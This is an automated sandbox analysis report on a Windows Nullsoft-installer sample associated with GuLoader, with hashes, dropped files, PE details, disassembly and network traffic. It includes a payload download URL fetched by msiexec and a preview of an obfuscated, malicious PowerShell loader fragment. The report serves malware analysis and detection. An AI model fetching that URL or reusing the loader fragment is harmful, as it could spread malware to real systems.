https://www.bookinginfo.asia/pkeZmGiUuTK20.bin)	msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/pkeZmGiUuTK20.binJ	msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544504
Start date and time:	2024-10-29 14:16:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	3lH2EWD4wU.exe renamed because original name is a hash value
Original Sample Name:	2f9c0ba283506d8333e4f59b29fbeba3.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/13@12/0
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 91% Number of executed functions: 34 Number of non-executed functions: 29
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: 3lH2EWD4wU.exe

Simulations

Behavior and APIs

Time	Type	Description
09:17:07	API Interceptor	36x Sleep call for process: powershell.exe modified
09:18:14	API Interceptor	574x Sleep call for process: msiexec.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exe	niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta	Get hash	malicious	Cobalt Strike, GuLoader, HTMLPhisher	Browse
	SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx	Get hash	malicious	HTMLPhisher	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kh04k5c3.vap.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvtivhly.ifu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sj5z0h4u.kez.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uga2spzi.vbw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Drtrsklers.gje

Download File

Process:	C:\Users\user\Desktop\3lH2EWD4wU.exe
File Type:	data
Category:	dropped
Size (bytes):	452017
Entropy (8bit):	2.2907928071456114
Encrypted:	false
SSDEEP:	3072:nceUkNUxshVME7hU9NU0nFKCOPX7q93VQ/FePcfz4liTx:ceUsHh2B3rGq93a/FePez4lA
MD5:	CFC1693292A6FA4423DE4EA6D7214FC4
SHA1:	51329C0E29AE97FED5B29734D10C71937B115D40
SHA-256:	9EF5DE718A03BB0CFC8036BE061029E47F2B65C7FB97F1F0A38D36EDF04FB9F0
SHA-512:	4F292AE045B2FA8A19E3FC2DAD43E6F8C4C16342742F3CDDE1F44BA1B7E7CCB8B36DE639E5EE5338A5DB1D6A35E18C1FA1813C019089953E96D71865AA995779
Malicious:	false
Preview:	..............IE..........u..C..x......................................... .....L................................C.......................r.........[.$.....o.........6"........w............c..................O........z2r....@........PA................w.......`e.......m..........JaO0.........4...............b.e..V......u.......I...q.........Q.......................W...............................\.B.........5.......................[.......U......q.................c.\|...........f..........<...........O.w................................0...........j...............7......!........c.......................................a....C..............................9....>..^......................[........"...............p...2..........................)...............3./.....g...............}o......u.........p...........n...............?..I.............v..........Ng^.........................=.B...................._.................................:................................Rb....Y.............

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf

Download File

Process:	C:\Users\user\Desktop\3lH2EWD4wU.exe
File Type:	ASCII text, with very long lines (4175), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	71728
Entropy (8bit):	5.19475938861983
Encrypted:	false
SSDEEP:	1536:5/quBkQjhD5zeJ93rzHqxhOH6h3s0fCZZjV/vhVO/SWBtx5:5/quBhj95w9PqCH90aLjJvhNMtP
MD5:	2766F86E62C8D61940DC2522F8A82F95
SHA1:	CC9A331C8194448233D7B7B557ADF479C971E23A
SHA-256:	20D2F9D0C92426D68CADC14CC683EA09985C306B86D6D9C43197C831216A08A0
SHA-512:	0C46AD1533CFAA33D1CB1D5D1FB8CED17DA0D8DF8F52943B24F2C6231B2D29BC28E31E85ACD59CC972F09C27CE2626CB1F0FC4807AB3FF9ED548975966756C32
Malicious:	true
Preview:	$Saling94=$Malingernes;..<#Udryddelsestruet Modsaetningerne Rheinlnderpolkaen Saturnist #>..<#Accorder Skyllerierne Usage Belagt #>..<#Ringbarks Ediths Maladjustment Amyroot Botaniserings byggemodent #>..<#Nephrotomy Dmmekrafts Blesbok Taknemlige Speak Winks snurretoppes #>..<#hustelefoner amphistome Bleeping #>..<#Filmcensuren Semidetached Optoelectronic Echoism Abcess remrk Papirmanuskript #>...$Chivalric = @'.Antraci.Las,ivi$st bharFPe vytruPosturanShapingjT,mposke styrvo=Resurfa$SkibsskDCestriaiCore,atk,astermtBr epsyaUkueligf BistorodeficitnIndvkegeG vernirbookisha shlarib TapeinnBrsinfoiCentr lnLomentugSkis ydsChi pabaFrazie,rDiabro rT mpusfa SpecianHexame gThioaceeSerial mSpringbeElefsfin stinkyt Semi ieIdiotist,ebeset;T.ansna.EarthwofPalaveruEpithecnSalvernc LingvitOperettiOverchaoReprsennUndertr P stdiO K ndervDrs.ioneAfkortnr KongrufScab.iklBrandalyDelmaentUnlovinn Telefoi.ydrodynBalandrgFinanspsAnti ri Eugeosy(Ferriti$ pidskaD DecastiUg.eskakInd jentEduta.naMacrocofMist.keo

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Netvrkslsninger.txt

Download File

Process:	C:\Users\user\Desktop\3lH2EWD4wU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	479
Entropy (8bit):	4.245739395890601
Encrypted:	false
SSDEEP:	6:2BJR4H4EduLCin3GLpsMA5jKGay2gCW5jmWXxaAJhTaR9G4FbIC6YWCY2I1j2y:SReduL5nMKjaEjthaAjSMoD6VH2I1j2y
MD5:	DA2B21298D7BAC439CD1EA3AC47F7866
SHA1:	1180904256A2CFDED5BBF3EC67E53178AC278C7F
SHA-256:	F2CA2632B5FF825BD631092BFB6D71FC4669E0F487FC49B58F4710024F4B89C4
SHA-512:	0071008D7FA440509188FD643AE2F5E707CC24A95EC64F419DEE8A3E014B9F2E2BDE40182A07869AF0C0BAE7089AAF89684A6070EC421E79F003E8DC412FF2DA
Malicious:	false
Preview:	azotemia fainting phycoerythrin stentando jitney colley,vagtmesterens aeolistic samhrigheds bedrifters velkldthed frysetrrede bobbysoxers lemlst letching etaerne..vrelsesanvisningerne stenogrammers cognations bekymret.deklarering chervante sjaskeris radarskrmes biklang servicebureau amerikanererne postcards..titivates taces recelebrated,avanceredes parallelodrome spermatia tidsbestemmer heterogeny shirtinget udflytningens aandssvages videoklub formidlingsindsatses funklede..

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	738435
Entropy (8bit):	7.94919421571998
Encrypted:	false
SSDEEP:	12288:Mzve08P627lFHqh94GdRwQc6ZvU234p8aHAxPFxImRraIgLNKYJpp/PXpCFWjKIl:cmtPMh94GdRwQcgvvGX+ImRraTLBn0Fo
MD5:	2F9C0BA283506D8333E4F59B29FBEBA3
SHA1:	23BC0A40B6690DAB55D797E9C35CD82D796B85B1
SHA-256:	979268F75B22895FAA5D5B6B39442C8CAA36D325EDEA3FAF7C3D7A81D09041B0
SHA-512:	A37AABDA8BE17AA24C854996784974A033F724932CAA8BEA4B036E9C60C08B834610BB0D569BD9D7A6CDEE34B921528F969E5A3970F05DF3387F46B80775CBDB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Joe Sandbox View:	Filename: niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta, Detection: malicious, Browse Filename: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F..v...F...@...F.Rich..F.........................PE..L...9.oZ.................d...\|.......2............@..........................p............@.................................4............f...........................................................................................................text....b.......d.................. ..`.rdata..T............h..............@..@.data....U...........\|..............@....ndata...................................rsrc....f.......h..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\Revisionistiskes.int

Download File

Process:	C:\Users\user\Desktop\3lH2EWD4wU.exe
File Type:	data
Category:	dropped
Size (bytes):	450653
Entropy (8bit):	2.2992929640630795
Encrypted:	false
SSDEEP:	3072:smAcos5/nDh2e3T+ey5w6j6dOaaXYyS44COAHNQ3M:tAcoiEenQ67aYb44yQ3
MD5:	913FB8371A4307B3DBC98975306E0FB3
SHA1:	4D6128E0B24FFC50F2AB09AC082D22B66ADFE1E6
SHA-256:	ACEDFA1D66401EC77F24737E8A4A9657798861330DB267E2F4E59B6B5EEBF179
SHA-512:	92A4A07479064BE793F7E3EC1B201BD8EA37058114EBA065D691BF787F16FA8C34AC4FFDDB2CFF8F71C473A0C5756A49A8FDE0BED11B84416D8F718110D70480
Malicious:	false
Preview:	..........3.D.........d....R..2.......#......................b......I.................B....-.................3..(...E....V................2......................^....n8.......^.........6:........4.....U@.............o.......................................a...{..........H...........)..................}.....[.......................ja.............5........5........W.C.................g.....@........9.....................p..7..........N........................S................."...........................................H4.-...................Q........7............{........96...................N.......................0...........c................................I.....k..........O.............[..........ar.............N...........B.............H.......V...........3..o...........q..\|.................................h..........................%.........u......P..g}..............7...................K...&............H..............................G.....\|..\|......................J..........

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\fortje.kur

Download File

Process:	C:\Users\user\Desktop\3lH2EWD4wU.exe
File Type:	data
Category:	dropped
Size (bytes):	123513
Entropy (8bit):	2.2973556752436455
Encrypted:	false
SSDEEP:	768:Qk455JVbpGo8b5SqA/5n2xrxWqSwMvldK8ijI/GFX//Q/nDULqAs//6SoA2PpzBq:Ql5/Kb5Sv2W73vldeGwn61As//6/l4
MD5:	CE36A2BA6422013091438D568FD65193
SHA1:	F20F7B837D70297B37CE212EE4BC8980DB3E5427
SHA-256:	053D85EC228282E11A69B40B0775E7D3805FD797DFD4677926610833463118AD
SHA-512:	7FD6F978AA9D942C1731B680A1A0573487F66616F57A440E1453AA40F149FCA9FF0C94FF33D089986D1654767676C6463D6103F9788BF1B4AF1996A64C9FDF18
Malicious:	false
Preview:	.........6e...........................6.....y.................................f..............................................6.......(!.......}..........,L.......................................p..............................l.8..............1.....J...................................................g....................................:..........................k...... ..........................i...0....f..................U....b.x....s.....v...7...........i...L.........f......................l........x.................$........Q.....................a......................f...............................f.)...........................................5..w.....................L................................%..............Y..................................K...a...K.............o5..............N.....I.......*...........V......O...........................u...............................w..,.........!...\..H.................i................J.Y......................W.....).....}..........

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Zigzaggy.aci

Download File

Process:	C:\Users\user\Desktop\3lH2EWD4wU.exe
File Type:	data
Category:	dropped
Size (bytes):	311522
Entropy (8bit):	7.666626729903848
Encrypted:	false
SSDEEP:	6144:j+7HcBLCB9vKGMtJD68ObAHf5MCTsvkyO6X4aZSpSN7fWmKLXCh++qto3/LeeSjx:j+7HcBLCB9vKGMtJD68ObAHf5MHvh9nO
MD5:	BF0AE96B3C32CA698C6492BA09769C91
SHA1:	5FB3A2489ADE567DC267D48D46C9A37175B1309F
SHA-256:	6BAD1E0AE040D5FFD918DB53F4B146CE35DE2AFAAD296E096C41C3E7DFCB953F
SHA-512:	16AFEAC5C98EA19E527920E169AF7D178A117C6D5B5F8E4924C5418D1D7604CE7838868B3444993C32FA33A9177E96921BA08ED16B1A998B294FFBD27B7D3439
Malicious:	false
Preview:	....m....iii.N.........).ss......................:..$....pp......SSS...........#....!.,........,,....+...........U.........F.......00.....k............^............~........Q...............DDDD.....................F........V...~~.OO...'............,...'''.............F....(....&&&.J......}.F............"""......8............3..........//.....................v................."...33.................jj.bb.D............!.cc.......9.....99........[............___...........``....#.T...............m...xx...a.............s...................+.uuu........................K................=======.V...........L............%%%...............!...............>......V...............p.......................................8....9.......Y.....===..........ww.......!!!!.ddddd.SS..:...........E.....i.....x...UUU..............x.........#...........~~~............AA............................o....ZZ............~..QQQQQQ...........ss........oo.Q.....gg............................................p..........

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.94919421571998
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	3lH2EWD4wU.exe
File size:	738'435 bytes
MD5:	2f9c0ba283506d8333e4f59b29fbeba3
SHA1:	23bc0a40b6690dab55d797e9c35cd82d796b85b1
SHA256:	979268f75b22895faa5d5b6b39442c8caa36d325edea3faf7c3d7a81d09041b0
SHA512:	a37aabda8be17aa24c854996784974a033f724932caa8bea4b036e9c60c08b834610bb0d569bd9d7a6cdee34b921528f969e5a3970f05df3387f46b80775cbdb
SSDEEP:	12288:Mzve08P627lFHqh94GdRwQc6ZvU234p8aHAxPFxImRraIgLNKYJpp/PXpCFWjKIl:cmtPMh94GdRwQcgvvGX+ImRraTLBn0Fo
TLSH:	EAF423D9B98532F7E45286B040A8ACB6B2531DAFC9BCA10BC70AB317BD735C6021F557
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L...9.oZ.................d...\|.....

File Icon


Icon Hash:	3c23436d4d0d1812

Static PE Info

General

Entrypoint:	0x40320c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A6FED39 [Tue Jan 30 03:57:45 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3abe302b6d9a1256e6a915429af4ffd2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080A0h]
call dword ptr [0040809Ch]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F40Ch], eax
je 00007FF2A4FA6773h
push ebx
call 00007FF2A4FA984Ah
cmp eax, ebx
je 00007FF2A4FA6769h
push 00000C00h
call eax
mov esi, 00408298h
push esi
call 00007FF2A4FA97C6h
push esi
call dword ptr [00408098h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FF2A4FA674Dh
push 0000000Ah
call 00007FF2A4FA981Eh
push 00000008h
call 00007FF2A4FA9817h
push 00000006h
mov dword ptr [0042F404h], eax
call 00007FF2A4FA980Bh
cmp eax, ebx
je 00007FF2A4FA6771h
push 0000001Eh
call eax
test eax, eax
je 00007FF2A4FA6769h
or byte ptr [0042F40Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F4D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429830h
call dword ptr [00408178h]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8534	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x40000	0x66b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x628f	0x6400	94777a1c66c6303b9367f07906450c26	False	0.670078125	data	6.442195364271234	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1354	0x1400	5143a41b917c20afc11d259fd85b6ffc	False	0.4599609375	data	5.236269898436511	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x25518	0x600	12c02de2bdc517e2722ceeb84aff8b34	False	0.455078125	data	4.04938010159809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x30000	0x10000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x40000	0x66b8	0x6800	e49df56a1c0561685226b68ce9a40022	False	0.33969350961538464	data	4.393028705918419	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x40208	0x5b90	Device independent bitmap graphic, 75 x 150 x 32, image size 22500, resolution 3779 x 3779 px/m	English	United States	0.31574232081911263
RT_DIALOG	0x45d98	0x120	data	English	United States	0.5173611111111112
RT_DIALOG	0x45eb8	0xf8	data	English	United States	0.6330645161290323
RT_DIALOG	0x45fb0	0xa0	data	English	United States	0.6125
RT_DIALOG	0x46050	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x460b0	0x14	data	English	United States	1.15
RT_VERSION	0x460c8	0x2b0	data	English	United States	0.4883720930232558
RT_MANIFEST	0x46378	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 14:18:15.696867943 CET	58375	53	192.168.2.6	1.1.1.1
Oct 29, 2024 14:18:15.706840038 CET	53	58375	1.1.1.1	192.168.2.6
Oct 29, 2024 14:18:19.796988010 CET	53242	53	192.168.2.6	1.1.1.1
Oct 29, 2024 14:18:19.921226978 CET	53	53242	1.1.1.1	192.168.2.6
Oct 29, 2024 14:18:24.812746048 CET	54246	53	192.168.2.6	1.1.1.1
Oct 29, 2024 14:18:24.823158026 CET	53	54246	1.1.1.1	192.168.2.6
Oct 29, 2024 14:18:29.859250069 CET	61174	53	192.168.2.6	1.1.1.1
Oct 29, 2024 14:18:29.868659019 CET	53	61174	1.1.1.1	192.168.2.6
Oct 29, 2024 14:18:34.812494040 CET	56001	53	192.168.2.6	1.1.1.1
Oct 29, 2024 14:18:34.822526932 CET	53	56001	1.1.1.1	192.168.2.6
